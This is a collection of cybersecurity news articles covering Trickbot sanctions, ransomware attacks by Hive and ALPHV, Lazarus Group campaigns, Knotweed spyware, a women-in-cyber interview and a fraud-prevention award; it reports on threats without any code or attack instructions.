U.S., U.K. Sanction 7 Men Tied to Trickbot Hacking Group

Authorities in the United States and United Kingdom today levied financial sanctions against seven men accused of operating “Trickbot,” a cybercrime-as-a-service platform based in Russia that has enabled countless ransomware attacks and bank account takeovers since its debut in 2016. The U.S. Department of the Treasury says the Trickbot group is associated with Russian intelligence services, and that this alliance led to the targeting of many U.S. companies and government entities.

Initially a stealthy trojan horse program delivered via email and used to steal passwords, Trickbot evolved into “a highly modular malware suite that provides the Trickbot Group with the ability to conduct a variety of illegal cyber activities, including ransomware attacks,” the Treasury Department said.

A spam email from 2020 containing a Trickbot-infected attachment. Image: Microsoft.

“During the height of the COVID-19 pandemic in 2020, Trickbot targeted hospitals and healthcare centers, launching a wave of ransomware attacks against hospitals across the United States,” the sanctions notice continued. “In one of these attacks, the Trickbot Group deployed ransomware against three Minnesota medical facilities, disrupting their computer networks and telephones, and causing a diversion of ambulances. Members of the Trickbot Group publicly gloated over the ease of targeting the medical facilities and the speed with which the ransoms were paid to the group.”

Only one of the men sanctioned today is known to have been criminally charged in connection with hacking activity. According to the Treasury Department, the alleged senior leader of the Trickbot group is 34-year-old Russian national Vitaly “Bentley” Kovalev.

A New Jersey grand jury indicted Kovalev in 2012 after an investigation by the U.S. Secret Service determined that he ran a massive “money mule” scheme, which used phony job offers to trick people into laundering money stolen from hacked small to mid-sized businesses in the United States. The 2012 indictment against Kovalev relates to cybercrimes he allegedly perpetrated prior to the creation of Trickbot.


In 2015, Kovalev reportedly began filming a movie in Russia about cybercrime called “Botnet.” According to a 2016 story from Forbes.ru, Botnet’s opening scene was to depict the plight of Christina Svechinskaya, a Russian student arrested by FBI agents in September 2010.

Christina Svechinskaya, a money mule hired by Bentley who was arrested by the FBI in 2010.

Svechinskaya was one of Bentley’s money mules, most of whom were young Russian students on temporary travel visas in the United States. She was among 37 alleged mules charged with aiding an international cybercrime operation — basically, setting up phony corporate bank accounts for the sole purpose of laundering stolen funds.

Although she possessed no real hacking skills, Svechinskaya’s mugshot and social media photos went viral online and she was quickly dubbed “the world’s sexiest computer hacker” by the tabloids.

Kovalev’s Botnet film project was disrupted after Russian authorities raided the film production company’s offices as part of a cybercrime investigation. In February 2016, Reuters reported that the raid was connected to a crackdown on “Dyre,” a sophisticated trojan that U.S. federal investigators say was the precursor to the Trickbot malware. The Forbes.ru article cited sources close to the investigation who said the film studio was operating as a money-laundering front for the cybercrooks behind Dyre.


But shifting political winds in Russia would soon bring high treason charges against three of the Russian cybercrime investigators tied to the investigation into the film studio. In a major shakeup in 2017, the Kremlin levied treason charges against Sergey Mikhaylov, then deputy chief of Russia’s top anti-cybercrime unit.

Also charged with treason was Ruslan Stoyanov, then a senior employee at Russian security firm Kaspersky Lab [the Forbes.ru report from 2016 said investigators from Mikhaylov’s unit and Kaspersky Lab were present at the film company raid].

Russian media outlets have speculated that the men were accused of treason for helping American cybercrime investigators pursue top Russian hackers. However, the charges against both men were classified and have never been officially revealed. After their brief, closed trial, both men were convicted of treason. Mikhaylov was given a 22 year prison sentence; Stoyanov was sentenced to 14 years in prison.

In September 2021, the Kremlin issued treason charges against Ilya Sachkov, formerly head of the cybersecurity firm Group-IB. According to Reuters, Sachkov and his company were hired by the film studio “to advise the Botnet director and writers on the finer points of cybercrime.” Sachkov remains imprisoned in Russia pending his treason trial.


Trickbot was heavily used by Conti and Ryuk, two of Russia’s most ruthless and successful ransomware groups. Blockchain analysis firm Chainalysis estimates that in 2021 alone, Conti extorted more than USD $100 million from its hacking victims; Chainalysis estimates Ryuk extorted more than USD $150 million from its ransomware victims.

The U.S. cybersecurity firm CrowdStrike has long tracked the activities of Trickbot, Ryuk and Conti under the same moniker — “Wizard Spider” — which CrowdStrike describes as “a Russia-nexus cybercriminal group behind the core development and distribution of a sophisticated arsenal of criminal tools, that allow them to run multiple different types of operations.”

“CrowdStrike Intelligence has observed WIZARD SPIDER targeting multiple countries and industries such as academia, energy, financial services, government, and more,” said Adam Meyers, head of intelligence at CrowdStrike.

This is not the U.S. government’s first swipe at the Trickbot group. In early October 2020, KrebsOnSecurity broke the news that someone had launched a series of coordinated attacks designed to disrupt the Trickbot botnet. A week later, The Washington Post ran a story saying the attack on Trickbot was the work of U.S. Cyber Command, a branch of the Department of Defense headed by the director of the U.S. National Security Agency (NSA).

Days after Russia invaded Ukraine in February 2022, a Ukrainian researcher leaked several years of internal chat logs from the Conti ransomware gang. Those candid conversations offer a fascinating view into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees. They also showed that Conti enjoyed protection from prosecution by Russian authorities, as long as the hacker group took care not to target Russian organizations.

In addition, the leaked Conti chats confirmed there was considerable overlap in the operation and leadership of Conti, Trickbot and Ryuk.

CrowdStrike’s Meyers said while Wizard Spider operations have significantly reduced following the demise of Conti in June 2022, today’s sanctions will likely cause temporary disruptions for the cybercriminal group while they look for ways to circumvent the financial restrictions — which make it illegal to transact with or hold the assets of sanctioned persons or entities.

“Often, when cybercriminal groups are disrupted, they will go dark for a time only to rebrand under a new name,” Meyers said.

The prosecution of Kovalev is being handled by the U.S. Attorney’s Office in New Jersey. A copy of the now-unsealed 2012 indictment of Kovalev is here (PDF).

#MIWIC2022: Paula Page, CCL Solutions Group

Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2022’s Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee’s answers are written in their own words with minor edits made by the editor for readability and where relevant, supplemented with additional commentary by their nominator.

This year, the awards are sponsored by Beazley, BT, KPMG and KnowBe4.

Paula Page, Director of Cyber, CCL Solutions Group Ltd

What does your job role entail?

All sorts! As my role started effectively within a start up, albeit within an already established business, I wore many hats every day, especially within the first few years but still often do as it’s very much a team effort.

Mostly though, my role in the Exec team and as Director of Cyber is mainly focused around the strategic piece, growth and relationship wise, client engagement and relationship building and then this is mirrored within my direct team as relationships are at the heart of everything we do.  

I work with my team to develop new service lines, I am responsible for recruitment, I get involved with scheduling still if needed (which is actually one of my favourite things, I love seeing a diary that has no space and working to make it happen, it’s a bit like Tetris for projects!) I am involved in supporting the billing process, I deal with any issues on projects or within the team that need to be escalated and genuinely get involved in anything and everything that pops its head up. I think that’s one of the things that led to me loving the work and industry so much, no two days are ever exactly the same and I love to be busy, fix problems and see progress. 

Many people in my role in other companies are technical but my background is very firmly rooted in the soft skills and relationship space, along with the commerciality. I have built an exceptionally strong technical team and together, we are able to ensure our clients and partners are provided with the best service made up of a team who are all experts in their field. 

How did you get into the cybersecurity industry?

Having always wanted to be a teacher, I decided on the day of sending my applications off that I really wasn’t sure anymore. I called my parents to tell them as I stood at the post box holding the envelope and they were really supportive, telling me to take my time and see what happened. 

Having no idea what was next, I worked a few admin roles as a temp and then saw a permanent role advertised in what turned out to be a Cyber Security company. It was never something I’d considered and absolutely didn’t think I’d end up making a career in the industry. 

I was offered the job as admin and the MD, Ian Glover, was really supporting and helped carve a role for me to support the Consultants. From there, another role developed and before long I was fully involved in the tender processes, scheduling work, carrying out QAs of proposals etc. I quickly realised I absolutely loved the work and the industry and the rest, as they say, is history!

What is one of the biggest challenges you have faced as a woman in the tech/cyber industry and how did you overcome it?

It won’t only be me who has often been the only woman in the room on many occasions over the years and this in itself can be a challenge, especially when you are in the early part of your career. It can be intimidating and I’m sure lots of women have found themselves in positions where the behaviour of others have made them want to give up. I was even told it wasn’t the industry for a woman and that I’d never ‘make’ it. 

My standout moment was at InfoSec a number of years back where someone felt it appropriate to proposition and touch me whilst on the stand for the company I worked for at the time with absolute confidence that he was doing nothing wrong. 

You can feel like no one has even seen you or that everyone’s eyes are on you but for totally the wrong reason, neither of which are pleasant. It’s also frustrating when the only topics you are invited to speak about are diversity, usually the done-to-death ‘woman in cyber’ angle. No one ever asks me to speak about being in an exec position, building a business or the soft skills which are so important in this industry and which are key to successful relationships. 

It can often be a struggle to have your voice or ideas heard but with persistence, and a huge dose of stubbornness, I started to feel that the people in the room were listening, and I was being asked for my ideas. It didn’t happen quickly, or easily, and I’d be lying if I said that the feeling of being seen as the token female doesn’t still hit sometimes. Imposter syndrome is also very real but again, gaining more confidence in my own ability and knowing that I am good at what I do, it happens less now than it used to.

I also feel that I have had to work far harder than any of my male colleagues to get into the position I am in now. 

What are your top three greatest accomplishments you have achieved during your career so far?

  • Building a business where people are the focus, both from a team and client perspective. I’ve worked with and for some great people through my career, but I have also worked for some whose behaviours were less than supportive and helped me be absolutely clear about the sort of leader I wanted to be should I ever get to that position. For me, the most important thing will always be the happiness of my team and clients and that has been the basis for everything I have done since I moved into my current role as Director of Cyber. 
  • Staying true to me, my ideas and my vision for the business that I wanted to build. I needed it to be something I was proud of, something that provided value and where clients wanted to return time after time. Being able to do this successfully whilst also raising a young family and ensuring I didn’t lose my time with them is something that took a lot of thought, planning and support from my husband but that I feel really proud that I’ve been able to do.
  • Working with and supporting young people through various competitions such as the NCSC Cyber First Girls Competition and Cyber Centurion. I also spend time with local schools, running Cyber Spotlight workshop days to highlight all the amazing opportunities within our industry in the hope of inspiring them to consider a cyber career in the future. I also support a charity that works to divert people who have been identified as being at risk of becoming involved in the criminal side of Cyber, and introduce them to the routes via various pathways into the ethical side of hacking. 

What are you doing to support other women, and/or to increase diversity, in the tech/cyber industry?

Supporting a team of girls in the NSCS Cyber First girls competition was a great experience last year. Talking to them about cyber as an industry and the various opportunities available to them, and seeing how interested they were, gave me so much hope for the future and I look forward to working with another team this year.

I am responsible for recruitment, so I constantly look to hire people from all backgrounds and experience levels. Having not gone to university myself, and having grown up on a council estate in Glasgow, I am all too aware of the barriers to industry that exist for working class people. I am very aware that I have my first MD to thank for opening so many doors for me and I will always want to pay that forward. 

Also, building a flexible and supportive team where people are able to drop children at school and pick them up, take family members to appointments or take time to care for them means that groups of people, often mothers, are able to work in roles that they otherwise lose out on due to these important commitments. The industry loses out on so much talent through lack of flexibility and in turn, sidelining mothers and parents. I firmly believe that flexible working is at the heart of a successful business as it opens the door to some incredible talent and if we’re not making it easy for parents and carers to come into or stay in our industry, we’re doing them, and it, a huge disservice. 

What is one piece of advice you would give to girls/women looking to enter the cybersecurity industry?

Do it! I feel genuinely lucky to have stumbled into a role that led me to a full career in a space that I’d never considered but that I absolutely love. If you’re considering a career in the industry, you already know about it which is a step further along than I was.

Remember all roles in the industry aren’t technical and in fact, the soft skills needed to succeed are just as important and lead you to many different options. I am not a technical resource, but I have built a successful business filled with amazing people where clients feel valued and cared for. 

Mostly, be prepared to work hard, question things when you think they need to be, go with your gut and be unapologetically yourself.

The post #MIWIC2022: Paula Page, CCL Solutions Group appeared first on IT Security Guru.

Hive Group Admits to Leaking Data in Tata Power Ransomware Attack

Reports have said that the Hive ransomware-as-a-service (RaaS) group has claimed responsibility for the cyber-attack against Tata Power disclosed by the company on October 14 and believed to have occurred on October 3.

“The company has taken steps to retrieve and restore the systems. All critical operational systems are functioning,” the Mumbai-based company said at the time.

Security researcher Rakesh Krishnan, has claimed that the leak has reportedly affected several of Tata’s 12 million customers and includes personally identifiable information (PII) like Aadhaar national identity card numbers, tax account numbers, salary information, addresses and phone numbers, among others.

It appears that many have taken Hive leaking the stolen data to mean that any ransomware negotiations failed, but Edward Liebig, global director of cyber-ecosystem at Hexagon, has suggested a different option.

“Let’s face it, even if negotiations are successful, there is still only a 50% chance of recovery of the encrypted assets,” Liebig told Infosecurity in an emailed statement.

“The decision to pay or not to pay is a business call. If the organization is in a very vulnerable position (recovery of assets is not possible), if there is a chance for extremely damaging information to be compromised, or if the potential business impact far outweighs the ransom payment, then the business may decide to pay.”

The executive has said another aspect to consider in this scenario is the rules of the cyber insurance carrier.

“Some Cyber Insurers prohibit the payment of a ransom,” Liebig said. “This means that a ransomware Incident Response (IR) playbook must have a very defined and comprehensive declaration and approval process that goes to the top of the executive team.”

Further to this, Liebig has said he believes that increasing the chances of defending against ransomware begins with watching the front and back doors.

“Watch for, block, and educate against incoming spam and phishing attempts. Know your assets and endpoints. Know and mitigate the vulnerabilities within your environment that enable the exploitation of those assets,” Liebig explained.

“The best way to defend against ransomware is never to let it take root in your systems. The next best way is to have a bulletproof, trusted recovery strategy to minimize downtime and eliminate the ‘ransom’ debate.”

The statistics published by Intel 471 and Digital Shadows, Hive was the third-most prevalent ransomware family observed in Q3 2022.

Lastly, the ransomware group also upgraded its tools to Rust in July to deliver more sophisticated encryption.

The post Hive Group Admits to Leaking Data in Tata Power Ransomware Attack appeared first on IT Security Guru.

Energy Providers Targeted by Lazarus Group

Larazrus Group, the North Korean threat actor group, targeted a malicious campaign towards energy providers around the world between February and July 2022.

In April and May, the campaign was partially disclosed by Symantec and AhnLab, respectively. Cisco Talos is providing more details now.

In an advisory written on Thursday, Cisco Talos said that the Lazarus campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain initial access to targeted organisation.

The advisory stated: “The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post–exploitation led to the download of their toolkit from web servers.”

“In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to.”

The security researchers said that they discovered the use of two unknown malware families, YamaBot and VSingle, alongside the deployment of a recently disclosed implant they called ‘MagicRAT.’

“Once the backdoors and implants were persisted and activated on the endpoint, the reverse shell used to perform cleanup[…], this included deleting all files in the infection folder along with the termination of the PowerShell tasks.”.

“The attacker–created accounts were removed and finally, the Windows Event logs […] would be purged.”

Organisations targeted, according to Cisco Talos, were from countries including Canada, Japan and the US.

Additionally, the write up reads: “The campaign is meant to infiltrate organizations around the world for establishing long–term access and subsequently exfiltrating data of interest to the adversary’s nation–state.”

This advisory is the latest in a long list describing the Lazarus Group’s activity over summer.

In June, it was reported that the threat actor may be behind the $100m theft from cryptocurrency firm Harmony.


The post Energy Providers Targeted by Lazarus Group appeared first on IT Security Guru.

Job Seekers Targeted in Lazarus Group Hack

The North Korea state-backed Lazarus Group has been observed to be targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.

ESET, a Slovak cybersecurity firm, linked these events to a campaign dubbed “Operation In(ter)ception” that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the military and aerospace sectors into opening fake job offer documents.

The latest attack is no different in that a job description for a Coinbase cryptocurrency exchange was used as a launchpad to drop a signed Mach-O executable.

The company Tweeted: “Malware is compiled for both Intel and Apple Silicon. It drops three files: a decoy PDF document ‘Coinbase_online_careers_2022_07.pdf’, a bundle ‘FinderFontsUpdater.app,’ and a downloader ‘safarifontagent.’”

The decoy file, while sporting the .PDF extension, is in reality a Mach-O executable that functions as a dropper to launch FinderFontsUpdater, which, in turn, executes safarifontsagent, a downloader designed to retrieve next-stage payloads from a remote server.

ESET said that the lure was signed on 21st July using a certificate issued in February 2022 to a developer named Shankey Nohria. Apply has started the process of revoking the certificate, as of 12th August.

It’s worth noting that the malware is cross-platformarg.

In July, it came to light that the Axie Infinity hack attributed to the Lazarus Group was the result of one of its former employees getting duped by a fake LinkedIn job offer.


The post Job Seekers Targeted in Lazarus Group Hack appeared first on IT Security Guru.

Feedzai with Lloyds Banking Group wins Aite-Novarica Fraud Impact Award

Feedzai has been named Best Transaction Fraud Monitoring and Decisioning Innovation in the Aite-Novarica Group 2022 Fraud Impact Innovation Awards. The award highlights how Feedzai empowers the bank’s data scientists to protect customers from scams and other fraud using a patented algorithm and providing a 360-degree entity view of payment risk. Due to its proficiency in mitigating fraud risk, Feedzai’s patent innovation is helping many financial institutions including Lloyds Banking Group, one of the largest retail banks in the world. 

According to recent reports, financial crime has been on the rise since the COVID-19 pandemic began and large numbers of people have turned online for their banking activities. In the U.S., the impact of identity fraud last year was $52 billion in financial loss, affecting 42 million consumer victims (Javelin Research). In the U.K., authorised push payment scams reached £355 million in the first half of 2021, a year-on-year increase of 70 percent. 

“Today’s fraud scams are increasingly hard to stop by traditional solutions because the transactions involve genuine customers on their actual devices, at their usual IP,” said Pedro Barata, Chief Product Officer Feedzai. “Lloyds Banking Group and Feedzai have pioneered an approach that utilises all available data across multiple channels to make fair fraud risk decisions in milliseconds, based on an individual’s specific details and activities, not one that is dependent on generalised customer groupings.” 

The Feedzai RiskOps Platform has been proven to increase protection for banking customers against scams. The innovation and technical strengths of the solution contributed to the award win, as they provide customers with tangible benefits, including: 

  • Financial crime risk mitigation – Higher detection rates and lower false-positives help protect banks and their customers from the costly and distressing experience of fraud and scams. 
  • Enhanced user experience – reduces friction for good customers and lowers the number of unnecessary contacts with analysts and call centres. 
  • Operational efficiency – Keeps intervention rates low and ensures a less complex system through model-driven as well as rule-driven systems. 

“Organised crime continues to attack financial services firms and consumers, always finding new and clever ways to circumvent their defences. Legacy approaches are less effective at keeping pace with, and adapting to, the escalating threat landscape,” says Chuck Subrt, Fraud & AML Practice Director at Aite-Novarica Group. “Fraud and AML executives recognise the imperative for more innovative tools that can drive meaningful intelligence, smarter decision-making, and better outcomes,” he explains. 

The post Feedzai with Lloyds Banking Group wins Aite-Novarica Fraud Impact Award appeared first on IT Security Guru.

Ransomware Group Demand £500,000 From Bedfordshire School

Wooton Upper School in Bedfordshire suffered a ransomware attack this week, with hackers demanding £500,000 in ransom, according to reports.
The attack also affected the Kimberley college for 16-19 year olds, with both members of the Wootton Academy Trust. The attack was said to be the work of the Hive ransomware group.
The cybercriminals messaged parents and students to inform them of the compromise. Bank details, medical records, home addresses and psychological reviews were stolen in the attack.
On Tuesday, the Trust updated students and parents by saying that the disruption to its operations was limited due to the upcoming summer school holidays. The attack has, however, affected the production of some grade sheets along with scheduling for next year. They hope that backups will allow them to retrieve some data. Normal operations are expected to return within 10 days.
The Hive group believes that Wooton has £500,000 in cyber insurance, according to Bedford Today, a local newspaper. It has threatened the Trust with the release of all data unless they pay up.
The trust said, “we understand there may be concerns about whether any pupil/student data has been impacted. While we don’t have firm answers to these questions at the moment, this is our number one priority of the ongoing investigations.”
Global cybersecurity advisor at ESET and former head of digital forensics at Dorset Police, Jake Moore, warned that the potential release of stolen data could pose a big problem for the Trust, even though the timing minimised disruption for the school.
Moore suggested that the damage could last for years. He added that local authorities often lack the funds to pay the desired ransoms, suggesting that this may not have been a targeted attack, rather it may have just been an attack caught up in a broader sweep of vulnerable systems.

The post Ransomware Group Demand £500,000 From Bedfordshire School appeared first on IT Security Guru.

Microsoft Threat Intelligence Center Links Threat Group to Austrian Spyware Vendor DSRIF

Microsoft has linked the efforts of the threat group Knotweed to an Austrian spyware vendor. The group has so far used the malware dubbed ‘SubZero’ to attack groups in Europe and Central America. The Subzero malware, as used by Knotweed, can be used to hack a target’s phone, computers, network, and internet-connected devices.

DSRIF markets itself as a company that provides information research, forensics, and data-driven intelligence services to corporations. Yet, Microsoft has found multiple associations between the two apparently dissimilar groups which establishes a concrete link.

“These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,” Microsoft said.

“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama.”

In 2021, the cyber mercenary group was also linked to the exploitation of a fourth zero-day, a Windows privilege escalation flaw in the Windows Update Medic Service (CVE-2021-36948) used to force the service to load an arbitrary signed DLL.

“To limit these attacks, we issued a software update to mitigate the use of vulnerabilities and published malware signatures that will protect Windows customers from exploits Knotweed was using to help deliver its malware,” said Cristin Goodwin, General Manager at Microsoft’s Digital Security Unit.

“We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms, where they are used to target human rights advocates, journalists, dissidents and others involved in civil society,” Goodwin added.

The post Microsoft Threat Intelligence Center Links Threat Group to Austrian Spyware Vendor DSRIF appeared first on IT Security Guru.

Ransomware Group Debuts Searchable Victim Data

Cybercrime groups that specialize in stealing corporate data and demanding a ransom not to publish it have tried countless approaches to shaming their victims into paying. The latest innovation in ratcheting up the heat comes from the ALPHV/BlackCat ransomware group, which has traditionally published any stolen victim data on the Dark Web. Today, however, the group began publishing individual victim websites on the public Internet, with the leaked data made available in an easily searchable form.

The ALPHV site claims to care about people’s privacy, but they let anyone view the sensitive stolen data.

ALPHV recently announced on its victim shaming and extortion website that it had hacked a luxury spa and resort in the western United States. Sometime in the last 24 hours, ALPHV published a website with the same victim’s name in the domain, and their logo on the homepage.

The website claims to list the personal information of 1,500 resort employees, and more than 2,500 residents at the facility. At the top of the page are two “Check Yourself” buttons, one for employees, and another for guests.

Brett Callow, a threat analyst with security firm Emsisoft, called the move by ALPHV “a cunning tactic” that will most certainly worry their other victims.

Callow said most of the victim shaming blogs maintained by the major ransomware and data ransom groups exist on obscure, slow-loading sites on the Darknet, reachable only through the use of third-party software like Tor. But the website erected by ALPHV as part of this new pressure tactic is available on the open Internet.

“Companies will likely be more concerned about the prospect of their data being shared in this way than of simply being posted to an obscure Tor site for which barely anyone knows the URL,” Callow said. “It’ll piss people off and make class actions more likely.”

It’s unclear if ALPHV plans to pursue this approach with every victim, but other recent victims of the crime group include a school district and a U.S. city. Most likely, this is a test run to see if it improves results.

“We are not going to stop, our leak distribution department will do their best to bury your business,” the victim website reads. “At this point, you still have a chance to keep your hotel’s security and reputation. We strongly advise you to be proactive in your negotiations; you do not have much time.”

Emerging in November 2021, ALPHV is perhaps most notable for its programming language (it is written in Rust). ALPHV has been actively recruiting operators from several ransomware organizations — including REvilBlackMatter and DarkSide — offering affiliates up to 90 percent of any ransom paid by a victim organization.

Many security experts believe ALPHV/BlackCat is simply a rebrand of another ransomware group — “Darkside” a.k.a. “BlackMatter,” the same gang responsible for the 2021 attack on Colonial Pipeline that caused fuel shortages and price spikes for several days last summer.

Callow said there may be an upside to this ALPHV innovation, noting that his wife recently heard directly from a different ransomware group — Cl0p.

“On a positive note, stunts like this mean people may actually find out that their PI has been compromised,” he said. “Cl0p emailed my wife last year. The company that lost her data still hasn’t made any public disclosure or notified the people who were impacted (at least, she hasn’t heard from the company.)”